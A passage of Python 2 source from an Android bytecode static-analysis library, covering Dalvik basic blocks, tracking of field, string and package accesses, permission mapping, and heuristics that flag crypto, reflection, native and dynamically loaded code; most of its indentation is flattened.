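    #   for n in ('invoke-virtual', 'invoke-static', 'if-eq'):
    #       ts.push(n)
    #   ts.get_string()  # -> 'OI' (consecutive 'O's collapse)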
class BreakBlock(object):
def __init__(self, _vm, idx):
self._vm = _vm
self._start = idx
self._end = self._start
self._ins = []
self._ops = []
self._fields = {}
self._methods = {}
def get_ops(self):
return self._ops
def get_fields(self):
return self._fields
def get_methods(self):
return self._methods
def push(self, ins):
self._ins.append(ins)
self._end += ins.get_length()
def get_start(self):
return self._start
def get_end(self):
return self._end
def show(self):
for i in self._ins:
print "\t\t",
i.show(0)
DVM_FIELDS_ACCESS = {
"iget" : "R",
"iget-wide" : "R",
"iget-object" : "R",
"iget-boolean" : "R",
"iget-byte" : "R",
"iget-char" : "R",
"iget-short" : "R",
"iput" : "W",
"iput-wide" : "W",
"iput-object" : "W",
"iput-boolean" : "W",
"iput-byte" : "W",
"iput-char" : "W",
"iput-short" : "W",
"sget" : "R",
"sget-wide" : "R",
"sget-object" : "R",
"sget-boolean" : "R",
"sget-byte" : "R",
"sget-char" : "R",
"sget-short" : "R",
"sput" : "W",
"sput-wide" : "W",
"sput-object" : "W",
"sput-boolean" : "W",
"sput-byte" : "W",
"sput-char" : "W",
"sput-short" : "W",
}
class DVMBasicBlock(object):
"""
A simple basic block of a dalvik method
"""
def __init__(self, start, vm, method, context):
self.__vm = vm
self.method = method
self.context = context
self.last_length = 0
self.nb_instructions = 0
self.fathers = []
self.childs = []
self.start = start
self.end = self.start
self.special_ins = {}
self.name = "%s-BB@0x%x" % (self.method.get_name(), self.start)
self.exception_analysis = None
self.tainted_variables = self.context.get_tainted_variables()
self.tainted_packages = self.context.get_tainted_packages()
self.notes = []
def get_notes(self):
return self.notes
def set_notes(self, value):
self.notes = [value]
def add_note(self, note):
self.notes.append(note)
def clear_notes(self):
self.notes = []
def get_instructions(self):
"""
Get all instructions from a basic block.
:rtype: Return all instructions in the current basic block
"""
tmp_ins = []
idx = 0
for i in self.method.get_instructions():
if idx >= self.start and idx < self.end:
tmp_ins.append(i)
idx += i.get_length()
return tmp_ins
def get_nb_instructions(self):
return self.nb_instructions
def get_method(self):
return self.method
def get_name(self):
return "%s-BB@0x%x" % (self.method.get_name(), self.start)
def get_start(self):
return self.start
def get_end(self):
return self.end
def get_last(self):
return self.get_instructions()[-1]
def get_next(self):
"""
Get next basic blocks
:rtype: a list of the next basic blocks
"""
return self.childs
def get_prev(self):
"""
Get previous basic blocks
:rtype: a list of the previous basic blocks
"""
return self.fathers
def set_fathers(self, f):
self.fathers.append(f)
def get_last_length(self):
return self.last_length
def set_childs(self, values):
#print self, self.start, self.end, values
if values == []:
next_block = self.context.get_basic_block( self.end + 1 )
if next_block != None:
self.childs.append( ( self.end - self.get_last_length(), self.end, next_block ) )
else:
for i in values:
if i != -1:
next_block = self.context.get_basic_block( i )
if next_block != None:
self.childs.append( ( self.end - self.get_last_length(), i, next_block) )
for c in self.childs:
if c[2] != None:
c[2].set_fathers( ( c[1], c[0], self ) )
def push(self, i):
try:
self.nb_instructions += 1
idx = self.end
self.last_length = i.get_length()
self.end += self.last_length
op_value = i.get_op_value()
# field access
if (op_value >= 0x52 and op_value <= 0x6d):
desc = self.__vm.get_cm_field(i.get_ref_kind())
if self.tainted_variables != None:
self.tainted_variables.push_info(TAINTED_FIELD, desc, DVM_FIELDS_ACCESS[i.get_name()][0], idx, self.method)
# invoke
elif (op_value >= 0x6e and op_value <= 0x72) or (op_value >= 0x74 and op_value <= 0x78):
idx_meth = i.get_ref_kind()
method_info = self.__vm.get_cm_method(idx_meth)
if self.tainted_packages != None:
self.tainted_packages.push_info(method_info[0], TAINTED_PACKAGE_CALL, idx, self.method, idx_meth)
# new_instance
elif op_value == 0x22:
idx_type = i.get_ref_kind()
type_info = self.__vm.get_cm_type(idx_type)
if self.tainted_packages != None:
self.tainted_packages.push_info(type_info, TAINTED_PACKAGE_CREATE, idx, self.method, None)
# const-string
elif (op_value >= 0x1a and op_value <= 0x1b):
string_name = self.__vm.get_cm_string(i.get_ref_kind())
if self.tainted_variables != None:
self.tainted_variables.push_info(TAINTED_STRING, string_name, "R", idx, self.method)
elif op_value == 0x26 or (op_value >= 0x2b and op_value <= 0x2c):
code = self.method.get_code().get_bc()
self.special_ins[idx] = code.get_ins_off(idx + i.get_ref_off() * 2)
        except Exception:
            # Best-effort analysis: do not abort block construction if a
            # single instruction cannot be resolved.
            pass
def get_special_ins(self, idx):
"""
Return the associated instruction to a specific instruction (for example a packed/sparse switch)
:param idx: the index of the instruction
:rtype: None or an Instruction
"""
try:
return self.special_ins[idx]
        except KeyError:
            return None
def get_exception_analysis(self):
return self.exception_analysis
def set_exception_analysis(self, exception_analysis):
self.exception_analysis = exception_analysis
TAINTED_LOCAL_VARIABLE = 0
TAINTED_FIELD = 1
TAINTED_STRING = 2
class PathVar(object):
def __init__(self, access, idx, dst_idx, info_obj):
self.access_flag = access
self.idx = idx
self.dst_idx = dst_idx
self.info_obj = info_obj
def get_var_info(self):
return self.info_obj.get_info()
def get_access_flag(self):
return self.access_flag
def get_src(self, cm):
method = cm.get_method_ref( self.idx )
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_dst(self, cm):
method = cm.get_method_ref( self.dst_idx )
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_idx(self):
return self.idx
class TaintedVariable(object):
def __init__(self, var, _type):
self.var = var
self.type = _type
self.paths = {}
self.__cache = []
def get_type(self):
return self.type
def get_info(self):
if self.type == TAINTED_FIELD:
return [ self.var[0], self.var[2], self.var[1] ]
return self.var
def push(self, access, idx, ref):
m_idx = ref.get_method_idx()
if m_idx not in self.paths:
self.paths[ m_idx ] = []
self.paths[ m_idx ].append( (access, idx) )
    def get_paths_access(self, mode):
        # self.paths maps a method index to a list of (access, idx) tuples, so
        # iterate that list directly (the old nested indexing could not work
        # with this storage layout).
        for m_idx in self.paths:
            for access, idx in self.paths[ m_idx ]:
                if access in mode:
                    yield m_idx, access, idx
def get_paths(self):
if self.__cache != []:
return self.__cache
for i in self.paths:
for j in self.paths[ i ]:
self.__cache.append( [j, i] )
#yield j, i
return self.__cache
def get_paths_length(self):
return len(self.paths)
def show_paths(self, vm):
show_PathVariable( vm, self.get_paths() )
class TaintedVariables(object):
def __init__(self, _vm):
self.__vm = _vm
self.__vars = {
TAINTED_LOCAL_VARIABLE : {},
TAINTED_FIELD : {},
TAINTED_STRING : {},
}
self.__cache_field_by_method = {}
self.__cache_string_by_method = {}
self.AOSP_PERMISSIONS_MODULE = load_api_specific_resource_module("aosp_permissions", self.__vm.get_api_version())
self.API_PERMISSION_MAPPINGS_MODULE = load_api_specific_resource_module("api_permission_mappings", self.__vm.get_api_version())
    # functions to get particular elements
def get_string(self, s):
try:
return self.__vars[ TAINTED_STRING ][ s ]
except KeyError:
return None
def get_field(self, class_name, name, descriptor):
key = class_name + descriptor + name
try:
return self.__vars[ TAINTED_FIELD ] [ key ]
except KeyError:
return None
def toPathVariable(self, obj):
z = []
for i in obj.get_paths():
access, idx = i[0]
m_idx = i[1]
z.append( PathVar(access, idx, m_idx, obj ) )
return z
# permission functions
def get_permissions_method(self, method):
permissions = set()
for f, f1 in self.get_fields():
data = "%s-%s-%s" % (f.var[0], f.var[2], f.var[1])
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"].keys():
for path in f.get_paths():
#access, idx = path[0]
m_idx = path[1]
if m_idx == method.get_idx():
permissions.update(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"][data])
return permissions
def get_permissions(self, permissions_needed):
"""
@param permissions_needed : a list of restricted permissions to get ([] returns all permissions)
        @rtype : a dictionary of permissions' paths
"""
permissions = {}
pn = set(permissions_needed)
if permissions_needed == []:
pn = set(self.AOSP_PERMISSIONS_MODULE["AOSP_PERMISSIONS"].keys())
for f, _ in self.get_fields():
data = "%s-%s-%s" % (f.var[0], f.var[2], f.var[1])
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"].keys():
perm_intersection = pn.intersection(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"][data])
for p in perm_intersection:
try:
permissions[p].extend(self.toPathVariable(f))
except KeyError:
permissions[p] = []
permissions[p].extend(self.toPathVariable(f))
return permissions
# global functions
def get_strings(self):
for i in self.__vars[ TAINTED_STRING ]:
yield self.__vars[ TAINTED_STRING ][ i ], i
def get_fields(self):
for i in self.__vars[ TAINTED_FIELD ]:
yield self.__vars[ TAINTED_FIELD ][ i ], i
    # specific functions
def get_strings_by_method(self, method):
z = {}
try:
for i in self.__cache_string_by_method[ method.get_method_idx() ]:
z[ i ] = []
for j in i.get_paths():
if method.get_method_idx() == j[1]:
z[i].append( j[0] )
return z
        except KeyError:
            return z
def get_fields_by_method(self, method):
z = {}
try:
for i in self.__cache_field_by_method[ method.get_method_idx() ]:
z[ i ] = []
for j in i.get_paths():
if method.get_method_idx() == j[1]:
z[i].append( j[0] )
return z
        except KeyError:
            return z
def add(self, var, _type, _method=None):
if _type == TAINTED_FIELD:
key = var[0] + var[1] + var[2]
if key not in self.__vars[ TAINTED_FIELD ]:
self.__vars[ TAINTED_FIELD ][ key ] = TaintedVariable( var, _type )
elif _type == TAINTED_STRING:
if var not in self.__vars[ TAINTED_STRING ]:
self.__vars[ TAINTED_STRING ][ var ] = TaintedVariable( var, _type )
elif _type == TAINTED_LOCAL_VARIABLE:
if _method not in self.__vars[ TAINTED_LOCAL_VARIABLE ]:
self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ] = {}
if var not in self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ]:
self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ][ var ] = TaintedVariable( var, _type )
def push_info(self, _type, var, access, idx, ref):
if _type == TAINTED_FIELD:
self.add( var, _type )
key = var[0] + var[1] + var[2]
self.__vars[ _type ][ key ].push( access, idx, ref )
method_idx = ref.get_method_idx()
if method_idx not in self.__cache_field_by_method:
self.__cache_field_by_method[ method_idx ] = set()
self.__cache_field_by_method[ method_idx ].add( self.__vars[ TAINTED_FIELD ][ key ] )
elif _type == TAINTED_STRING:
self.add( var, _type )
self.__vars[ _type ][ var ].push( access, idx, ref )
method_idx = ref.get_method_idx()
if method_idx not in self.__cache_string_by_method:
self.__cache_string_by_method[ method_idx ] = set()
self.__cache_string_by_method[ method_idx ].add( self.__vars[ TAINTED_STRING ][ var ] )
TAINTED_PACKAGE_CREATE = 0
TAINTED_PACKAGE_CALL = 1
TAINTED_PACKAGE = {
TAINTED_PACKAGE_CREATE : "C",
TAINTED_PACKAGE_CALL : "M"
}
def show_Path(vm, path):
cm = vm.get_class_manager()
if isinstance(path, PathVar):
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
info_var = path.get_var_info()
print "%s %s (0x%x) ---> %s->%s%s" % (path.get_access_flag(),
info_var,
path.get_idx(),
dst_class_name,
dst_method_name,
dst_descriptor)
else:
if path.get_access_flag() == TAINTED_PACKAGE_CALL:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
print "%d %s->%s%s (0x%x) ---> %s->%s%s" % (path.get_access_flag(),
src_class_name,
src_method_name,
src_descriptor,
path.get_idx(),
dst_class_name,
dst_method_name,
dst_descriptor)
else:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
print "%d %s->%s%s (0x%x)" % (path.get_access_flag(),
src_class_name,
src_method_name,
src_descriptor,
path.get_idx())
def get_Path(vm, path):
x = {}
cm = vm.get_class_manager()
if isinstance(path, PathVar):
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
info_var = path.get_var_info()
x["src"] = "%s" % info_var
x["dst"] = "%s %s %s" % (dst_class_name, dst_method_name, dst_descriptor)
x["idx"] = path.get_idx()
else:
if path.get_access_flag() == TAINTED_PACKAGE_CALL:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
x["src"] = "%s %s %s" % (src_class_name, src_method_name, src_descriptor)
x["dst"] = "%s %s %s" % (dst_class_name, dst_method_name, dst_descriptor)
else:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
x["src"] = "%s %s %s" % (src_class_name, src_method_name, src_descriptor)
x["idx"] = path.get_idx()
return x
def show_Paths(vm, paths):
"""
Show paths of packages
:param vm: the object which represents the dex file
    :param paths: a list of :class:`PathP` or :class:`PathVar` objects
"""
for path in paths:
show_Path( vm, path )
def get_Paths(vm, paths):
"""
Return paths of packages
:param vm: the object which represents the dex file
    :param paths: a list of :class:`PathP` or :class:`PathVar` objects
"""
full_paths = []
for path in paths:
full_paths.append(get_Path( vm, path ))
return full_paths
def show_PathVariable(vm, paths):
for path in paths:
access, idx = path[0]
m_idx = path[1]
method = vm.get_cm_method(m_idx)
print "%s %x %s->%s %s" % (access, idx, method[0], method[1], method[2][0] + method[2][1])
class PathP(object):
def __init__(self, access, idx, src_idx, dst_idx):
self.access_flag = access
self.idx = idx
self.src_idx = src_idx
self.dst_idx = dst_idx
def get_access_flag(self):
return self.access_flag
def get_dst(self, cm):
method = cm.get_method_ref(self.dst_idx)
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_src(self, cm):
method = cm.get_method_ref(self.src_idx)
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_idx(self):
return self.idx
def get_src_idx(self):
return self.src_idx
def get_dst_idx(self):
return self.dst_idx
class TaintedPackage(object):
def __init__(self, vm, name):
self.vm = vm
self.name = name
self.paths = {TAINTED_PACKAGE_CREATE : [], TAINTED_PACKAGE_CALL : []}
def get_name(self):
return self.name
def gets(self):
return self.paths
def push(self, access, idx, src_idx, dst_idx):
p = PathP( access, idx, src_idx, dst_idx )
self.paths[ access ].append( p )
return p
def get_objects_paths(self):
return self.paths[ TAINTED_PACKAGE_CREATE ]
def search_method(self, name, descriptor):
"""
@param name : a regexp for the name of the method
@param descriptor : a regexp for the descriptor of the method
@rtype : a list of called paths
"""
l = []
m_name = re.compile(name)
m_descriptor = re.compile(descriptor)
for path in self.paths[ TAINTED_PACKAGE_CALL ]:
_, dst_name, dst_descriptor = path.get_dst(self.vm.get_class_manager())
if m_name.match( dst_name ) != None and m_descriptor.match( dst_descriptor ) != None:
l.append( path )
return l
    def get_method(self, name, descriptor):
        l = []
        cm = self.vm.get_class_manager()
        for path in self.paths[ TAINTED_PACKAGE_CALL ]:
            # PathP has no get_name()/get_descriptor(); resolve the
            # destination through the class manager instead.
            _, dst_name, dst_descriptor = path.get_dst( cm )
            if dst_name == name and dst_descriptor == descriptor:
                l.append( path )
        return l
def get_paths(self):
for i in self.paths:
for j in self.paths[ i ]:
yield j
def get_paths_length(self):
x = 0
for i in self.paths:
x += len(self.paths[ i ])
return x
    def get_methods(self):
        return list(self.paths[TAINTED_PACKAGE_CALL])
    def get_new(self):
        return list(self.paths[TAINTED_PACKAGE_CREATE])
def show(self):
cm = self.vm.get_class_manager()
print self.get_name()
for _type in self.paths:
print "\t -->", _type
if _type == TAINTED_PACKAGE_CALL:
for path in self.paths[_type]:
print "\t\t => %s <-- %x in %s" % (path.get_dst(cm), path.get_idx(), path.get_src(cm))
else:
for path in self.paths[_type]:
print "\t\t => %x in %s" % (path.get_idx(), path.get_src(cm))
def show_Permissions(dx):
"""
Show where permissions are used in a specific application
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
p = dx.get_permissions( [] )
for i in p:
print i, ":"
for j in p[i]:
show_Path( dx.get_vm(), j )
def show_DynCode(dx):
"""
Show where dynamic code is used
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
paths = []
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/BaseDexClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/PathClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"loadDex",
"."))
show_Paths( dx.get_vm(), paths )
def show_NativeMethods(dx):
"""
Show the native methods
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
print get_NativeMethods(dx)
def show_ReflectionCode(dx):
"""
Show the reflection code
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
paths = dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;", ".", ".")
show_Paths(dx.get_vm(), paths)
def get_NativeMethods(dx):
"""
Return the native methods
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: [tuple]
"""
d = dx.get_vm()
native_methods = []
for i in d.get_methods():
if i.get_access_flags() & 0x100:
native_methods.append(
(i.get_class_name(), i.get_name(), i.get_descriptor()))
return native_methods
def get_ReflectionCode(dx):
"""
Return the reflection code
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: [dict]
"""
paths = dx.get_tainted_packages().search_methods(
"Ljava/lang/reflect/Method;", ".", ".")
return get_Paths(dx.get_vm(), paths)
def is_crypto_code(dx):
"""
    Is crypto code present?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljavax/crypto/.",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/security/spec/.",
".",
"."):
return True
return False
def is_dyn_code(dx):
"""
    Is Dalvik dynamic code loading present?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ldalvik/system/BaseDexClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/PathClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"loadDex",
"."):
return True
return False
def is_reflection_code(dx):
"""
    Is reflection code present?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Field;",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/Class;",
"forName",
"."):
return True
return False
def is_native_code(dx):
"""
    Is native code present?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljava/lang/System;",
"load.",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/Runtime;",
"load.",
"."):
return True
return False
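# The four is_*_code() helpers above are cheap boolean heuristics; a common
# pattern (hypothetical, not part of this module) is to combine them into a
# quick triage of a sample:
#
#   flags = {"crypto": is_crypto_code(dx), "dyncode": is_dyn_code(dx),
#            "reflection": is_reflection_code(dx), "native": is_native_code(dx)}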
class TaintedPackages(object):
def __init__(self, _vm):
self.__vm = _vm
self.__packages = {}
self.__methods = {}
self.AOSP_PERMISSIONS_MODULE = load_api_specific_resource_module("aosp_permissions", self.__vm.get_api_version())
self.API_PERMISSION_MAPPINGS_MODULE = load_api_specific_resource_module("api_permission_mappings", self.__vm.get_api_version())
def _add_pkg(self, name):
if name not in self.__packages:
self.__packages[ name ] = TaintedPackage( self.__vm, name )
    def push_info(self, class_name, access, idx, method, idx_method):
        self._add_pkg( class_name )
        p = self.__packages[ class_name ].push( access, idx, method.get_method_idx(), idx_method )
        self.__methods.setdefault( method, {} ).setdefault( class_name, [] ).append( p )
def get_packages_by_method(self, method):
try:
return self.__methods[method]
except KeyError:
return {}
def get_package(self, name):
return self.__packages[name]
    def get_packages_by_bb(self, bb):
        """
        :rtype: a list of packages used in a basic block
        """
        l = []
        for i in self.__packages:
            paths = self.__packages[i].gets()
            for j in paths:
                for k in paths[j]:
                    # A PathP only records the instruction index, so match it
                    # against the basic block's address range (the old code
                    # called non-existent PathP methods).
                    if bb.get_start() <= k.get_idx() < bb.get_end():
                        l.append( (i, k.get_access_flag(), k.get_idx(), k.get_src_idx()) )
        return l
def get_packages(self):
for i in self.__packages:
yield self.__packages[i], i
def get_internal_packages_from_package(self, package):
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if src_class_name == package and dst_class_name in classes:
l.append(j)
return l
def get_internal_packages(self):
"""
:rtype: return a list of the internal packages called in the application
"""
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if dst_class_name in classes and m.get_name() in classes:
l.append(j)
return l
def get_internal_new_packages(self):
"""
:rtype: return a list of the internal packages created in the application
"""
classes = self.__vm.get_classes_names()
l = {}
for m, _ in self.get_packages():
paths = m.get_new()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
if src_class_name in classes and m.get_name() in classes:
if j.get_access_flag() == TAINTED_PACKAGE_CREATE:
                        l.setdefault(m.get_name(), []).append(j)
return l
def get_external_packages(self):
"""
:rtype: return a list of the external packages called in the application
"""
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if src_class_name in classes and dst_class_name not in classes:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
l.append(j)
return l
def search_packages(self, package_name):
"""
:param package_name: a regexp for the name of the package
:rtype: a list of called packages' paths
"""
ex = re.compile(package_name)
l = []
for m, _ in self.get_packages():
if ex.search(m.get_name()) != None:
l.extend(m.get_methods())
return l
    def search_unique_packages(self, package_name):
        """
        :param package_name: a regexp for the name of the package
        :rtype: a list of [class, name, descriptor] triples and a dict of repeat counts
        """
        ex = re.compile( package_name )
        l = []
        d = {}
        cm = self.__vm.get_class_manager()
        for m, _ in self.get_packages():
            if ex.match( m.get_name() ) != None:
                for path in m.get_methods():
                    # Resolve the destination through the class manager; PathP
                    # itself does not expose name/descriptor accessors.
                    dst_class_name, dst_name, dst_descriptor = path.get_dst( cm )
                    key = dst_class_name + dst_name + dst_descriptor
                    try:
                        d[ key ] += 1
                    except KeyError:
                        d[ key ] = 0
                    l.append( [ dst_class_name, dst_name, dst_descriptor ] )
        return l, d
def search_methods(self, class_name, name, descriptor, re_expr=True):
"""
@param class_name : a regexp for the class name of the method (the package)
@param name : a regexp for the name of the method
@param descriptor : a regexp for the descriptor of the method
@rtype : a list of called methods' paths
"""
l = []
        if re_expr:
ex = re.compile( class_name )
for m, _ in self.get_packages():
if ex.search( m.get_name() ) != None:
l.extend( m.search_method( name, descriptor ) )
return l
def search_objects(self, class_name):
"""
@param class_name : a regexp for the class name
@rtype : a list of created objects' paths
"""
ex = re.compile( class_name )
l = []
for m, _ in self.get_packages():
if ex.search( m.get_name() ) != None:
l.extend( m.get_objects_paths() )
return l
def search_crypto_packages(self):
"""
@rtype : a list of called crypto packages
"""
return self.search_packages( "Ljavax/crypto/" )
def search_telephony_packages(self):
"""
@rtype : a list of called telephony packages
"""
return self.search_packages( "Landroid/telephony/" )
def search_net_packages(self):
"""
@rtype : a list of called net packages
"""
return self.search_packages( "Landroid/net/" )
def get_method(self, class_name, name, descriptor):
try:
return self.__packages[ class_name ].get_method( name, descriptor )
except KeyError:
return []
def get_permissions_method(self, method):
permissions = set()
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
if j.get_method() == method:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
dst_class_name, dst_method_name, dst_descriptor = j.get_dst( self.__vm.get_class_manager() )
data = "%s-%s-%s" % (dst_class_name, dst_method_name, dst_descriptor)
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"].keys():
permissions.update(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"][data])
return permissions
def get_permissions(self, permissions_needed):
"""
@param permissions_needed : a list of restricted permissions to get ([] returns all permissions)
        @rtype : a dictionary of permissions' paths
"""
permissions = {}
pn = set(permissions_needed)
if permissions_needed == []:
pn = set(self.AOSP_PERMISSIONS_MODULE["AOSP_PERMISSIONS"].keys())
classes = self.__vm.get_classes_names()
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, src_method_name, src_descriptor = j.get_src( self.__vm.get_class_manager() )
dst_class_name, dst_method_name, dst_descriptor = j.get_dst( self.__vm.get_class_manager() )
if (src_class_name in classes) and (dst_class_name not in classes):
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
data = "%s-%s-%s" % (dst_class_name, dst_method_name, dst_descriptor)
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"].keys():
perm_intersection = pn.intersection(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"][data])
for p in perm_intersection:
try:
permissions[p].append(j)
except KeyError:
permissions[p] = []
permissions[p].append(j)
return permissions
class Enum(object):
def __init__(self, names):
self.names = names
for value, name in enumerate(self.names):
setattr(self, name.upper(), value)
def tuples(self):
return tuple(enumerate(self.names))
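# Sketch of how Enum behaves (it is used right below for TAG_ANDROID): each
# name is upper-cased and bound to its position in the list.
#
#   e = Enum(['android', 'telephony'])
#   e.ANDROID     # -> 0
#   e.tuples()    # -> ((0, 'android'), (1, 'telephony'))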
TAG_ANDROID = Enum([ 'ANDROID', 'TELEPHONY', 'SMS', 'SMSMESSAGE', 'ACCESSIBILITYSERVICE', 'ACCOUNTS',
'ANIMATION', 'APP', 'BLUETOOTH', 'CONTENT', 'DATABASE', 'DEBUG', 'DRM', 'GESTURE',
'GRAPHICS', 'HARDWARE', 'INPUTMETHODSERVICE', 'LOCATION', 'MEDIA', 'MTP',
'NET', 'NFC', 'OPENGL', 'OS', 'PREFERENCE', 'PROVIDER', 'RENDERSCRIPT',
'SAX', 'SECURITY', 'SERVICE', 'SPEECH', 'SUPPORT', 'TEST', 'TEXT', 'UTIL',
'VIEW', 'WEBKIT', 'WIDGET', 'DALVIK_BYTECODE', 'DALVIK_SYSTEM', 'JAVA_REFLECTION'])
TAG_REVERSE_ANDROID = dict((i[0], i[1]) for i in TAG_ANDROID.tuples())
TAGS_ANDROID = { TAG_ANDROID.ANDROID : [ 0, "Landroid" ],
TAG_ANDROID.TELEPHONY : [ 0, "Landroid/telephony"],
TAG_ANDROID.SMS : [ 0, "Landroid/telephony/SmsManager"],
TAG_ANDROID.SMSMESSAGE : [ 0, "Landroid/telephony/SmsMessage"],
TAG_ANDROID.DEBUG : [ 0, "Landroid/os/Debug"],
TAG_ANDROID.ACCESSIBILITYSERVICE : [ 0, "Landroid/accessibilityservice" ],
TAG_ANDROID.ACCOUNTS : [ 0, "Landroid/accounts" ],
TAG_ANDROID.ANIMATION : [ 0, "Landroid/animation" ],
TAG_ANDROID.APP : [ 0, "Landroid/app" ],
TAG_ANDROID.BLUETOOTH : [ 0, "Landroid/bluetooth" ],
TAG_ANDROID.CONTENT : [ 0, "Landroid/content" ],
TAG_ANDROID.DATABASE : [ 0, "Landroid/database" ],
TAG_ANDROID.DRM : [ 0, "Landroid/drm" ],
TAG_ANDROID.GESTURE : [ 0, "Landroid/gesture" ],
TAG_ANDROID.GRAPHICS : [ 0, "Landroid/graphics" ],
TAG_ANDROID.HARDWARE : [ 0, "Landroid/hardware" ],
TAG_ANDROID.INPUTMETHODSERVICE : [ 0, "Landroid/inputmethodservice" ],
TAG_ANDROID.LOCATION : [ 0, "Landroid/location" ],
TAG_ANDROID.MEDIA : [ 0, "Landroid/media" ],
TAG_ANDROID.MTP : [ 0, "Landroid/mtp" ],
TAG_ANDROID.NET : [ 0, "Landroid/net" ],
TAG_ANDROID.NFC : [ 0, "Landroid/nfc" ],
TAG_ANDROID.OPENGL : [ 0, "Landroid/opengl" ],
TAG_ANDROID.OS : [ 0, "Landroid/os" ],
TAG_ANDROID.PREFERENCE : [ 0, "Landroid/preference" ],
TAG_ANDROID.PROVIDER : [ 0, "Landroid/provider" ],
TAG_ANDROID.RENDERSCRIPT : [ 0, "Landroid/renderscript" ],
TAG_ANDROID.SAX : [ 0, "Landroid/sax" ],
TAG_ANDROID.SECURITY : [ 0, "Landroid/security" ],
TAG_ANDROID.SERVICE : [ 0, "Landroid/service" ],
TAG_ANDROID.SPEECH : [ 0, "Landroid/speech" ],
TAG_ANDROID.SUPPORT : [ 0, "Landroid/support" ],
TAG_ANDROID.TEST : [ 0, "Landroid/test" ],
TAG_ANDROID.TEXT : [ 0, "Landroid/text" ],
TAG_ANDROID.UTIL : [ 0, "Landroid/util" ],
TAG_ANDROID.VIEW : [ 0, "Landroid/view" ],
TAG_ANDROID.WEBKIT : [ 0, "Landroid/webkit" ],
TAG_ANDROID.WIDGET : [ 0, "Landroid/widget" ],
TAG_ANDROID.DALVIK_BYTECODE : [ 0, "Ldalvik/bytecode" ],
TAG_ANDROID.DALVIK_SYSTEM : [ 0, "Ldalvik/system" ],
